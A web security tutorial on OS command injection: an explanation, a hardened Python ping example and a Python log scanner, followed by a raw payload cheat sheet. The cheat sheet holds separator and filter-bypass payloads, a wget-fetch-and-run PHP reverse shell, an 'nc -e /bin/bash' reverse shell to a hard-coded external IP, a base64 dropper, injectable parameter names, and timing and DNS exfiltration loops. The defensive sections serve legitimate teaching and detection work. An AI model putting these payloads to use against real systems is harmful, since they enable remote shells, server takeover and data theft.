This article covers Command Injection, a class of attack in which an attacker executes arbitrary operating system commands on the server hosting the application. A successful attack can lead to complete compromise of the application and all of its data, since the executed commands typically give the attacker unauthorized access to, or control over, the application's environment and the underlying system.
Disclaimer: This material is for informational purposes only. The authors are not responsible for any possible misuse of the information. Knowledge of vulnerabilities is essential to improving software security.
Command Injection is one of the most common and dangerous types of attacks on web applications and servers. In this attack, the attacker is able to execute arbitrary operating system commands on the server, which gives them control over the application, its data, and potentially the entire system.
This type of attack emerged together with the growth of web technologies, when developers began invoking system commands to automate tasks on servers. Careless handling of user input frequently creates vulnerabilities that allow third-party commands to be executed. For example, if an application passes user input directly to the operating system shell without proper validation, an attacker can append their own command and change the behavior of the application.
The danger of this type of attack is as follows:
Gaining access to the system. An attacker can gain access to system files, databases, or confidential information.
Complete control over the server. If the attack is successful, the attacker can install malware, modify data, or even use the server for further attacks.
Degraded performance or outages. Executing resource-intensive commands can overload or crash the system.
Financial and reputational losses. Compromise of customer data or corporate information can cause significant losses.
It is important to understand that command injection is independent of programming language and platform: any system that executes operating system commands built from untrusted input is potentially vulnerable. Protection against such attacks consists of applying secure coding principles, such as validating and sanitizing input, using parameterized queries, and minimizing privileges.
Command injection is a serious threat that can have catastrophic consequences for system security. Understanding its mechanism and implementing timely protection helps to avoid risks.
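The two defenses named above (input validation and keeping untrusted data out of the shell's parser) are easiest to see side by side. The following is an added example, not code from the original article: a "ping a host" feature written first in the vulnerable string-splicing style, then hardened with an allowlist and an argument vector. The sample inputs, the `ping -c 1` command and all function names are assumptions for the illustration.

```python
import re
import subprocess

# Constructed sample inputs (assumptions, not from the article): a benign
# target and one carrying the ';' separator from the cheat sheet below.
BENIGN_INPUT = "127.0.0.1"
INJECTED_INPUT = "127.0.0.1; id"


# --- The defect: user input spliced into a string that a shell will parse. ---
def build_ping_command_vulnerable(host: str) -> str:
    """Command string an application might hand to os.system() or
    subprocess.run(..., shell=True). The shell treats ';', '|', '&&',
    newlines, backticks and $() inside `host` as syntax, not data."""
    return f"ping -c 1 {host}"


# --- Fix 1: allowlist validation. Only DNS-label / IPv4 characters pass,
#     so every metacharacter from the cheat sheet is rejected outright.
#     Labels may not start with '-', which also blocks a value such as
#     "-f" from being parsed by ping as an option (argument injection). ---
LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
HOST_RE = re.compile(rf"(?:{LABEL}\.)*{LABEL}")


def is_valid_host(host: str) -> bool:
    return HOST_RE.fullmatch(host) is not None


# --- Fix 2: an argument vector instead of a shell string. ---
def build_ping_argv(host: str) -> list[str]:
    """argv for ping; the host is one argument and is never re-parsed by a shell."""
    if not is_valid_host(host):
        raise ValueError(f"rejected host: {host!r}")
    return ["ping", "-c", "1", host]


def run_ping(host: str) -> subprocess.CompletedProcess:
    """shell=False (the default) passes argv straight to the OS, so even
    "127.0.0.1; id" would reach ping as a single literal argument.
    The timeout bounds the resource-exhaustion risk described above."""
    return subprocess.run(build_ping_argv(host), capture_output=True,
                          text=True, timeout=10, check=False)


if __name__ == "__main__":
    print("vulnerable string:", build_ping_command_vulnerable(INJECTED_INPUT))
    print("hardened argv    :", build_ping_argv(BENIGN_INPUT))
    try:
        build_ping_argv(INJECTED_INPUT)
    except ValueError as exc:
        print("rejected         :", exc)
```

The allowlist deliberately accepts only hostnames and IPv4 literals; if a feature must accept IPv6 or other syntaxes, extend the pattern rather than falling back to a denylist of metacharacters, which is the approach the bypass tricks further down this page are designed to defeat.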
#Both Unix and Windows supported
ls||id; ls ||id; ls|| id; ls || id # Execute both
ls|id; ls |id; ls| id; ls | id # Execute both (using a pipe)
ls&&id; ls &&id; ls&& id; ls && id # Execute 2nd if 1st finishes ok
ls&id; ls &id; ls& id; ls & id # Execute both but you can only see the output of the 2nd
ls %0A id # %0A Execute both (RECOMMENDED)
#Only unix supported
`ls` # ``
$(ls) # $()
ls; id # ; Chain commands
ls${LS_COLORS:10:1}${IFS}id # Might be useful
#Not executed but may be interesting
> /var/www/html/out.txt #Try to redirect the output to a file
< /etc/passwd #Try to send some input to the command
vuln=127.0.0.1 %0a wget https://web.es/reverse.txt -O /tmp/reverse.php %0a php /tmp/reverse.php
vuln=127.0.0.1%0anohup nc -e /bin/bash 51.15.192.49 80
vuln=echo PAYLOAD > /tmp/pay.txt; cat /tmp/pay.txt | base64 -d > /tmp/pay; chmod 744 /tmp/pay; /tmp/pay
?cmd={payload}
?exec={payload}
?command={payload}
?execute={payload}
?ping={payload}
?query={payload}
?jump={payload}
?code={payload}
?reg={payload}
?do={payload}
?func={payload}
?arg={payload}
?option={payload}
?load={payload}
?process={payload}
?step={payload}
?read={payload}
?function={payload}
?req={payload}
?feature={payload}
?exe={payload}
?module={payload}
?payload={payload}
?run={payload}
?print={payload}
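The separator list and the parameter-name list above are also what a defender looks for in web server logs. As an added example that is not part of the original page, the following scanner parses constructed combined-format access-log lines, percent-decodes each query parameter, and flags values containing the separators and substitutions from the cheat sheet; a hit in one of the listed parameter names, or a construct that rarely occurs in legitimate input, is rated high severity, while a lone `&`, `|`, `<` or `>` elsewhere is rated low. The log lines, severity rules and function names are assumptions for the illustration.

```python
import re
from urllib.parse import parse_qsl, urlparse

# Constructed access-log lines (assumed combined-style format; not from the
# page). The last line is a benign search that happens to contain '&', to
# show the low-severity path.
LOG_LINES = [
    '10.0.0.5 - - [12/Mar/2024:10:01:02 +0000] "GET /ping.php?host=127.0.0.1 HTTP/1.1" 200 512',
    '10.0.0.5 - - [12/Mar/2024:10:01:09 +0000] "GET /ping.php?host=127.0.0.1%3Bid HTTP/1.1" 200 640',
    '10.0.0.7 - - [12/Mar/2024:10:02:15 +0000] "GET /ping.php?host=127.0.0.1%0Acat%20/etc/passwd HTTP/1.1" 200 2048',
    '10.0.0.9 - - [12/Mar/2024:10:03:40 +0000] "POST /api/run?cmd=ls%24%7BIFS%7Did HTTP/1.1" 403 0',
    '10.0.0.11 - - [12/Mar/2024:10:04:01 +0000] "GET /search?q=apples%20%26%20pears HTTP/1.1" 200 1200',
]

# Parameter names from the list above; any indicator in one of these is
# high severity regardless of which construct it is.
SUSPECT_PARAMS = {
    "cmd", "exec", "command", "execute", "ping", "query", "jump", "code",
    "reg", "do", "func", "arg", "option", "load", "process", "step", "read",
    "function", "req", "feature", "exe", "module", "payload", "run", "print",
}

# (regex, label, strong): separators and substitutions from the cheat sheet.
# 'strong' constructs almost never occur in legitimate input; a single
# '|', '&', '<' or '>' does, so on its own it only rates low severity.
INDICATORS = [
    (re.compile(r"\|\|"), "separator ||", True),
    (re.compile(r"&&"), "separator &&", True),
    (re.compile(r";"), "separator ;", True),
    (re.compile(r"[\r\n]"), "newline (%0A) separator", True),
    (re.compile(r"`"), "backtick substitution", True),
    (re.compile(r"\$\("), "$() substitution", True),
    (re.compile(r"\$\{IFS\}"), "${IFS} whitespace bypass", True),
    (re.compile(r"\$\{\w+:\d+:\d+\}"), "parameter-expansion slicing", True),
    (re.compile(r"\|"), "pipe |", False),
    (re.compile(r"&"), "background &", False),
    (re.compile(r"[<>]"), "redirection", False),
]

REQUEST_RE = re.compile(r'"(?:[A-Z]+) (?P<target>\S+) HTTP/')


def extract_params(line: str) -> list:
    """Return the decoded (name, value) query parameters of a log line;
    percent-decoding (e.g. %0A -> newline) is done by parse_qsl."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    return parse_qsl(urlparse(m.group("target")).query, keep_blank_values=True)


def analyse_params(params) -> list:
    """Match every parameter value against the indicator table."""
    findings = []
    for name, value in params:
        hits = [(label, strong) for rx, label, strong in INDICATORS if rx.search(value)]
        if not hits:
            continue
        strong_hit = any(strong for _, strong in hits)
        severity = "high" if strong_hit or name.lower() in SUSPECT_PARAMS else "low"
        findings.append({
            "param": name,
            "value": value,
            "indicators": [label for label, _ in hits],
            "severity": severity,
        })
    return findings


def scan_log(lines) -> list:
    """Return (line, findings) for every request carrying at least one indicator."""
    results = []
    for line in lines:
        findings = analyse_params(extract_params(line))
        if findings:
            results.append((line, findings))
    return results


if __name__ == "__main__":
    for line, findings in scan_log(LOG_LINES):
        for f in findings:
            print(f"[{f['severity']}] {f['param']}={f['value']!r}: {', '.join(f['indicators'])}")
```

Decoding before matching matters: the `%0A` and `${IFS}` tricks above exist precisely because encoded or whitespace-free payloads slip past naive string matching on the raw request line. Only GET-style query parameters are examined here; request bodies are not in a standard access log and need to be captured separately.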
Data extraction: character by character
swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
real 0m5.007s
user 0m0.000s
sys 0m0.000s
swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == a ]; then sleep 5; fi
real 0m0.002s
user 0m0.000s
sys 0m0.000s
1. Go to http://dnsbin.zhack.ca/
2. Execute a simple 'ls'
for i in $(ls /) ; do host "$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done
$(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.').sudo.co.il)
Online tools to check for DNS-based data theft
dnsbin.zhack.ca
pingb.in
Windows:
powershell C:**2\n??e*d.*? # notepad
@^p^o^w^e^r^shell c:**32\c*?c.e?e # calc